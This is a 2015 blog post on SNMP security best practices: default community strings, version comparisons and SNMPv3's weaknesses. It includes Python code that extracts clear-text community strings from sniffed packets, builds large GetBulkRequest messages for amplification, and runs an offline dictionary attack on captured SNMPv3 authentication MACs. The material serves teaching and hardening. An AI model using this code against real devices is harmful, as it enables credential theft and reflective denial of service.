Friday, August 21, 2015

SNMP Security Considerations

In Chapter 1 of SolarWinds Server & Application Monitor: Deployment and Administration you will find a number of tutorials on configuring SNMP on your physical and virtual infrastructure. The intent of the book is to get SolarWinds up and running quickly with minimal hassle, so all procedures and examples use SNMPv2c read-only community strings. As mentioned in the book, this post extends Chapter 1, Deployment Strategy, to highlight some SNMP security considerations and best practices.

Community String Common Mistakes
More often than not, community strings come pre-configured on network devices with the following defaults:
read-only: public
read-write: private
  • Leaving them as public and/or private is a significant security risk: anyone who can reach UDP/161 on the device can read (and, with private, write) its configuration. Change both default community strings.
  • Assign long, random community strings, and treat them as you would passwords for highly privileged accounts such as Domain Admin. A community string is sent in clear text with every request, so each one is a secret that anyone on the network path can capture.
  • Do not remove a community string and leave it blank. Assuming that a blank string disables, for example, read-write access is not accurate. If read-write is not needed, disable it explicitly, and restrict whichever community remains to the monitoring server's source address with an access list.
In 2000 the SANS (SysAdmin, Audit, Network, and Security) Institute listed this mistake in its Top Ten critical Internet security threats. It has been a known problem for a long time, yet it is astonishing how many organizations still have public and private set on a number of devices.

Version Breakdown
Presently there are three SNMP versions in use: SNMPv1, SNMPv2c, and SNMPv3. Which version should you use? The short answer: use SNMPv3 unless you absolutely have to use SNMPv2c, and do not use SNMPv1 at all. Keep reading for the reasoning behind this.

SNMPv1
Introduced in 1988 (RFC 1067, revised as RFC 1157 in 1990). It predates Windows 3.0. Do you still use that? No. So don't use SNMPv1. :)
  • Pros:
    • Easy to configure via community string based authentication.
    • Compatible with legacy devices.
  • Cons:
    • Plain text authentication: the community string (effectively the password) crosses the network unencrypted, so a simple packet sniffer on the path captures it and enables the cons that follow.
    • Exposure of your internal network topology (interface tables, routing tables, ARP caches).
    • Unauthorized modification of system configuration data via a read-write community.
    • Manipulation of access control lists (ACL).
    • Denial-of-Service (DoS): SNMP runs over UDP with no rate limiting, so an agent can be flooded, and a writable community lets an attacker set damaging values.
    • Format string vulnerabilities in the message decoders of many SNMPv1 implementations (see CERT advisory CA-2002-03).
    • Buffer overflow vulnerabilities in those same decoders, triggered by malformed requests or traps.
    • 32-bit counters only, which wrap in about 34 seconds on a busy gigabit interface.
SNMPv2c
SNMPv2c is one of three SNMPv2 variants; the other two, party-based SNMPv2 (SNMPv2p) and user-based SNMPv2u, are left out of this breakdown because they were not widely adopted. Well... not adopted at all really: they added security, but the administrative complexity that came with it unfortunately (unwisely) lost out to usability. SolarWinds uses SNMPv2c unless you explicitly choose SNMPv1 (let's not do that) or SNMPv3 (much better idea).
  • Pros:
    • Easy to configure via community string based authentication.
    • Widely compatible and adoptable.
    • Some improvements over SNMPv1: revised message formats, a couple of new PDU types (actually a con as well, as you will see below), and 64-bit counters.
  • Cons:
    • Plain text SNMPv1-style community string authentication, with no encryption.
    • All of the SNMPv1 security-related cons.
    • The new GetBulkRequest lets a caller pull a large chunk of a MIB subtree in a single exchange. Because SNMP runs over UDP, the source address can be spoofed, so a few dozen bytes of request produce a much larger response aimed at a victim: an SNMPv2c agent exposed on UDP/161 is usable as an amplifier in a Distributed Reflective Denial of Service (DRDoS) attack.
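To make the clear-text point concrete, here is an added example, written for this post and not code from SolarWinds or any SNMP library, that builds an SNMPv1/v2c GetRequest and GetBulkRequest in raw BER and then parses the datagram the way a sniffer on the path would. The OID, community string and request-id are constructed sample values; in practice the bytes would come from a capture rather than being built in memory, and the same parser recovers the community from either.

```python
"""Minimal SNMPv1/v2c message encoder and decoder (ASN.1 BER).

Constructed for this post to show that the community string is sent in
clear text and that a GetBulkRequest is only a few dozen bytes on the wire.
"""

# ASN.1/BER tags used by SNMP messages
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_NEXT_REQUEST, GET_BULK_REQUEST = 0xA0, 0xA1, 0xA5


def _length(n):
    """BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, payload):
    return bytes([tag]) + _length(len(payload)) + payload


def _integer(value):
    # two's-complement, minimal length (128 needs two bytes: 00 80)
    n = (value.bit_length() + 8) // 8
    return _tlv(INTEGER, value.to_bytes(n, "big", signed=True))


def _oid(dotted):
    """Dotted OID to BER: first two arcs packed as 40*a+b, rest base-128."""
    ids = [int(x) for x in dotted.split(".")]
    out = bytearray([ids[0] * 40 + ids[1]])
    for sub in ids[2:]:
        chunk = bytearray([sub & 0x7F])
        sub >>= 7
        while sub:
            chunk.insert(0, 0x80 | (sub & 0x7F))
            sub >>= 7
        out += chunk
    return _tlv(OID, bytes(out))


def build_request(community, oid, version=1, pdu_type=GET_REQUEST,
                  request_id=1, non_repeaters=0, max_repetitions=0):
    """Return one SNMP message. version 0 = SNMPv1, 1 = SNMPv2c.

    For GetBulkRequest the two slots that normally hold error-status and
    error-index carry non-repeaters and max-repetitions instead.
    """
    varbind = _tlv(SEQUENCE, _oid(oid) + _tlv(NULL, b""))
    if pdu_type == GET_BULK_REQUEST:
        a, b = non_repeaters, max_repetitions
    else:
        a, b = 0, 0
    pdu = _tlv(pdu_type, _integer(request_id) + _integer(a) + _integer(b)
               + _tlv(SEQUENCE, varbind))
    return _tlv(SEQUENCE, _integer(version)
                + _tlv(OCTET_STRING, community.encode()) + pdu)


def _read_tlv(buf, pos):
    """Read one tag/length/value at pos; return (tag, value, next_pos)."""
    tag = buf[pos]
    ln = buf[pos + 1]
    pos += 2
    if ln & 0x80:
        k = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + k], "big")
        pos += k
    return tag, buf[pos:pos + ln], pos + ln


def sniff_community(datagram):
    """What a passive sniffer sees in a UDP/161 payload: (version, community, pdu tag).

    No key, no decryption, no guessing: the community string is the second
    element of the outer SEQUENCE.
    """
    tag, msg, _ = _read_tlv(datagram, 0)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)
    pdu_tag, _, _ = _read_tlv(msg, pos)
    return int.from_bytes(ver, "big"), community.decode(), pdu_tag


if __name__ == "__main__":
    get = build_request("public", "1.3.6.1.2.1.1.1.0")  # sysDescr.0 over v2c
    print(get.hex())
    print(sniff_community(get))
    bulk = build_request("public", "1.3.6.1.2.1",
                         pdu_type=GET_BULK_REQUEST, max_repetitions=2250)
    print(len(bulk), "byte GetBulkRequest; the reply can be many times larger")
```

Run it and the `70 75 62 6c 69 63` ("public") is plainly visible in the hex dump; that is all a sniffer needs. The GetBulkRequest is 38 bytes, which is the whole amplification story: a spoofed source address and a reply of up to max-repetitions varbinds.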
SNMPv3
In this corner we finally have some security, weighing in at decent. SNMPv3 keeps the same fundamental architecture (and the same PDUs) as SNMPv1 and SNMPv2c, but adds a security subsystem around them. Note, I have a pending blog post to provide a guide for configuring SNMPv3 on a few different platforms.
  • Pros:
    • User-based Security Model (USM).
      • Hash-based authentication via HMAC-MD5-96 (Message Digest algorithm 5) or HMAC-SHA-96 (Secure Hash Algorithm 1): the sender proves it holds the user's key without ever sending the key, mitigating the risk of plain text community string authentication.
      • Encryption with Data Encryption Standard in Cipher Block Chaining mode (DES-CBC). AES-128 (RFC 3826) was added later and most current agents support it; prefer it where available.
    • Some enhanced functional improvements over SNMPv2c in regards to the administrative framework.
  • Cons:
    • More complicated to configure and maintain, adding some administrative effort.
    • Only "weighing in at decent" security because:
      • DES uses a 56-bit key and is susceptible to brute force attacks; use AES where the agent supports it.
      • No key management: the symmetric keys are derived from the user's passphrase and localized per agent engine ID, so there is no automated distribution or rotation, and changing a passphrase means updating every agent that user is configured on.
      • Debatable man-in-the-middle (MITM) attack vulnerability. The more practical risk is that a captured authenticated message lets an attacker guess the passphrase offline, which is why the mitigation is strong passphrases.
    • Minor performance reduction when compared to earlier versions.
Do not let the cons of SNMPv3 deter you. It is still far more secure than SNMPv1 and SNMPv2c. That said, if you're ambitious and want to kick it up a notch, then you may want to check out Net-SNMP.
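As an added example, not from the original post and not any agent's code, the following implements the RFC 3414 password-to-key and key-localization steps behind the USM pros above, and then demonstrates the offline guessing attack behind the "mitigated by strong passwords" con: given a sniffed authenticated message and its 12-byte MAC, each candidate passphrase costs two hashes and one HMAC, and nothing on the wire slows the attacker down. The passphrase "maplesyrup" and the engine ID are the RFC 3414 Appendix A test values; the message bytes are a constructed placeholder standing in for a real SNMPv3 message with its msgAuthenticationParameters field zeroed, as the HMAC is computed over in the standard.

```python
"""SNMPv3 USM key derivation (RFC 3414 A.2) and an offline passphrase guess.

Constructed for this post. Shows why the localized key is per-agent and why
a weak authentication passphrase is recoverable from one captured message.
"""
import hashlib
import hmac

# RFC 3414 Appendix A test values
RFC_ENGINE_ID = bytes.fromhex("000000000000000000000002")
RFC_PASSWORD = b"maplesyrup"


def password_to_key(password: bytes, algo: str) -> bytes:
    """Ku = H(password repeated cyclically to 1,048,576 bytes).

    The 1 MB stretch is the only work factor USM gives you, so the
    passphrase itself has to carry the entropy.
    """
    reps, rem = divmod(1048576, len(password))
    return hashlib.new(algo, password * reps + password[:rem]).digest()


def localize_key(ku: bytes, engine_id: bytes, algo: str) -> bytes:
    """Kul = H(Ku || snmpEngineID || Ku): a different key for every agent.

    This is the 'no key management' con in code: there is no exchange,
    just a deterministic function of passphrase and engine ID.
    """
    return hashlib.new(algo, ku + engine_id + ku).digest()


def auth_param(kul: bytes, wire_msg: bytes, algo: str) -> bytes:
    """msgAuthenticationParameters: HMAC-MD5-96 / HMAC-SHA-96 (12 bytes)."""
    return hmac.new(kul, wire_msg, algo).digest()[:12]


def crack_auth_password(wire_msg: bytes, observed_mac: bytes, engine_id: bytes,
                        algo: str, wordlist):
    """Offline dictionary attack on one captured authNoPriv/authPriv message.

    The engine ID is visible in the message header, the MAC is the
    authentication parameter field, and the message is everything else.
    Returns the passphrase if it is in the wordlist, else None.
    """
    for guess in wordlist:
        kul = localize_key(password_to_key(guess, algo), engine_id, algo)
        if hmac.compare_digest(auth_param(kul, wire_msg, algo), observed_mac):
            return guess
    return None


def demo(algo: str = "md5"):
    """Run the attack against a constructed message; returns the hit."""
    # Constructed placeholder for an SNMPv3 message with the 12 MAC bytes zeroed.
    wire_msg = b"\x30\x3f\x02\x01\x03" + RFC_ENGINE_ID + b"\x00" * 12 + b"\xa0\x10"
    kul = localize_key(password_to_key(RFC_PASSWORD, algo), RFC_ENGINE_ID, algo)
    observed = auth_param(kul, wire_msg, algo)  # what the sniffer captured
    wordlist = [b"public", b"password", b"snmpv3", RFC_PASSWORD]
    return crack_auth_password(wire_msg, observed, RFC_ENGINE_ID, algo, wordlist)


if __name__ == "__main__":
    ku = password_to_key(RFC_PASSWORD, "md5")
    print("Ku (MD5): ", ku.hex())
    print("Kul (MD5):", localize_key(ku, RFC_ENGINE_ID, "md5").hex())
    print("recovered:", demo("md5"))
```

The two printed keys match RFC 3414 Appendix A.3.1, which is a quick way to validate any agent or manager implementation you are debugging. Swapping `"md5"` for `"sha1"` gives the A.3.2 values. Note that the wordlist succeeds because "maplesyrup" is in it; a long random passphrase is what makes the loop hopeless, and that is the entire content of the "mitigated by strong passwords" advice.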
